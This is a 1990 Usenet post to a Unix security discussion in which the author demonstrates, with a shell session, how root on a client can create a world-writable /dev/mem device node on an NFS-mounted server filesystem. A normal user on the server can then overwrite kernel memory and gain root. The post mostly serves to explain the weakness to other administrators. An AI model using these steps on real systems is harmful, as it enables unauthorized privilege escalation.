Xref: utzoo comp.unix.internals:1564 alt.security:1805
Path: utzoo!utgpu!cs.utexas.edu!sun-barr!newstop!texsun!convex!news
From: tchrist@convex.COM (Tom Christiansen)
Newsgroups: comp.unix.internals,alt.security
Subject: Re: becoming root via NFS
Message-ID: <1990Dec19.180541.7693@convex.com>
Date: 19 Dec 90 18:05:41 GMT
References: <4088@osc.COM> <111544@convex.convex.com> <114827@uunet.UU.NET>
Sender: news@convex.com (news access account)
Reply-To: tchrist@convex.COM (Tom Christiansen)
Organization: CONVEX Software Development, Richardson, TX
Lines: 65
Nntp-Posting-Host: pixel.convex.com

[ I've gotten nothing but confused and disbelieving mail on this,
  so apparently I did not adequately describe the scenario. ]

From the keyboard of rbj@uunet.UU.NET (Root Boy Jim):
:In article <111544@convex.convex.com> tchrist@convex.COM (Tom Christiansen) writes:
:I follow you so far, but...
:
:? Do a mknod 
:? giving it the major,minor numbers of /dev/mem on the server,
:? not the workstation.
:
:Um, only root can do a mknod, `nobody' can't.


Says who?  This isn't so.  I'm on my workstation.  I'm the superuser.
I've got the trusting server's filesystem mounted on my system.
(It's a diskless 350, so I have to have something.)   I can certainly
do the mknod.  Watch (I'm root@cthulhu, my workstation):

cthulhu# df .
Filesystem            kbytes    used   avail capacity  Mounted on
globhost:/usr/spool/globdata
                      371967  280812   53958    84%    /rmt/globhost/globdata

    [ ``globhost'' is another Sun, but this works with non-Sun NFS 
	systems as well. ]

cthulhu# ls -lgd .
drwxrwxrwt 43 root     bin          4096 Dec 19 11:52 ./

    [ Even if it weren't world-write, I could become the owner
      and make a world-write subdir. ]


cthulhu# ls -lg /dev/mem
crw-r-----  1 root     kmem       3,   0 May 29  1990 /dev/mem

cthulhu# mknod mymem c 3 0

    [ I actually have to choose the right major/minor number 
      for the server, not the client, if it's his kernel I 
      wish to crack. ]


cthulhu# ls -l  mymem
crw-r--r--  1 -2         3,   0 Dec 19 11:49 mymem

    [ See, I made it fine, and it's owned by "nobody". ]

cthulhu# chmod 666 mymem

cthulhu# ls -l mymem
crw-rw-rw-  1 -2         3,   0 Dec 19 11:58 mymem


Now, go over to the server and you can write his kernel as a normal user.
I've already demo'd how to use adb to punch your shell's uid to 0,
although you should get the cred structure, too.  You could also make a
nice disk device and read things if you want.

--tom
--
Tom Christiansen		tchrist@convex.com	convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
 to look at yourself in the mirror the next morning."  -me